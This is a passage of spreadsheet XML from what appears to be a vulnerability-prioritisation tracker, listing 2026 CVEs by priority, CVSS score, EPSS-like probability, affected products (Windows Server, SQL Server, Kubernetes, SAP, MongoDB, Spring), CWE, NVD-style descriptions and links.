      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr"/>
      <c r="Q25" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77493</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr"/>
      <c r="Q26" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19274</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr"/>
      <c r="Q27" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>IBM Observability with Instana (Agent) Build 1.0.303 through 1.0.323 IBM Instana Agent Operator could allow an authenticated Kubernetes tenant to hijack or permanently destroy another tenant's cluster-level RBAC permissions, caused by cluster-scoped RBAC objects being keyed solely by the bare CR name with no namespace disambiguation, allowing a same-named `InstanaAgent` CR in an attacker-controlled namespace to silently overwrite the shared `ClusterRoleBinding` or delete it outright and revoke the victim agent's cluster monitoring access.</t>
        </is>
      </c>
      <c r="S27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19274</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76969</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr"/>
      <c r="Q28" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>@sap/cds-mtxs NPM library does not perform sufficient checks on certain functionality used in multitenant CAP applications with extensibility enabled. An unauthenticated attacker could send specially crafted requests to obtain sensitive credentials and abuse them to replace or delete tenant data. Successful exploitation can result in a high impact on availability and integrity of the application. There may also be partial impact to the confidentiality of business data.</t>
        </is>
      </c>
      <c r="S28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76969</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55068</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr"/>
      <c r="Q29" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>free5GC is an open-source implementation of the 5G core network. In 4.2.2 and earlier, the NRF RegisterNFInstance handler at PUT /nnrf-nfm/v1/nf-instances/{nfInstanceID} accepts NF Profiles without enforcing UUID format, nfStatus enum values, heartBeatTimer ranges, mandatory profile fields, or nfServices.ipEndPoints address constraints. The invalid profiles are persisted in the MongoDB NfProfile collection and returned by NFDiscover, allowing an attacker with SBI access to advertise attacker-controlled network-function endpoints and redirect control-plane signaling. This can expose credentials and signaling, alter service discovery integrity, and deny service across network functions that trust the NRF. This issue is fixed in version 4.2.3.</t>
        </is>
      </c>
      <c r="S29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55068</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66794</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr"/>
      <c r="Q30" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the `cluster-proxy-addon` component of Multicluster Engine for Kubernetes. This vulnerability allows an unauthenticated attacker, who can access the user-facing route, to bypass authentication and authorization checks. By manipulating URL path segments, the attacker can proxy requests to arbitrary services across any managed cluster. This enables unauthorized access to internal services that would otherwise be protected, potentially leading to information disclosure or further compromise of the cluster environment.</t>
        </is>
      </c>
      <c r="S30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66794</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82526</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr"/>
      <c r="Q31" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>R2R through 3.6.6 contains a stacked SQL injection vulnerability that allows unauthenticated attackers to execute arbitrary SQL statements by manipulating the index name parameter in the vector index creation endpoint. The index name is interpolated directly into a CREATE INDEX statement via string formatting without identifier quoting or allowlist validation, enabling arbitrary DDL and DML execution through semicolon-separated statements under the PostgreSQL superuser account.</t>
        </is>
      </c>
      <c r="S31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82526</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82067</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr"/>
      <c r="Q32" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>Improper handling of case sensitivity in the configuration validation component of MongoDB Server may cause the authorization subsystem to remain in a default disabled state during server startup. An unauthenticated user with network access to a deployment where this condition occurs can perform arbitrary administrative operations, resulting in full impact of data confidentiality, integrity, and availability.</t>
        </is>
      </c>
      <c r="S32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82067</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79571</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr"/>
      <c r="Q33" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>Incorrect access control in the SellerAuthorizeAspect component of springboot-project v1.0.0 allows unauthenticated attackers to access all seller management interfaces and list all products/orders, put products on/off sale, finish/cancel orders, and modify categories without authentication.</t>
        </is>
      </c>
      <c r="S33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66768</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr"/>
      <c r="Q34" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>SAP GUI for Java does not correctly enforce the trust level policy for certain functions invoked from a connected backend system. A low-privileged attacker could exploit this weakness by manipulating a connected backend system to trigger affected functionality. This could allow arbitrary command execution on the victim's machine, leading to a high impact on the confidentiality, integrity, and availability of the affected system.</t>
        </is>
      </c>
      <c r="S34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr"/>
      <c r="Q35" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55521</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr"/>
      <c r="Q36" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>Yamcs is a mission control framework. Prior to 5.12.8 and 5.13.2, Yamcs omits authorization checks in IndexesApi.listPacketIndex, IndexesApi.listEventIndex, Cop1Api.disable, Cop1Api.resume, Cop1Api.initialize, Cop1Api.updateConfig, and TimeApi.setTime. An authenticated low-privilege user can read packet and event index metadata without ObjectPrivilegeType.ReadPacket, alter COP-1 link state without SystemPrivilege.ControlLinks, and manipulate simulation time. These operations can disclose telemetry metadata, disrupt telecommand handling, and affect system integrity and availability. This issue is fixed in versions 5.12.8 and 5.13.2.</t>
        </is>
      </c>
      <c r="S36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55521</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62706</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K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7" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr"/>
      <c r="Q37" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-125</t>
        </is>
      </c>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62706</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66814</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr"/>
      <c r="Q38" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66814</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66818</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr"/>
      <c r="Q39" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>Improper privilege management in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66818</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66819</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr"/>
      <c r="Q40" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66819</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66820</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
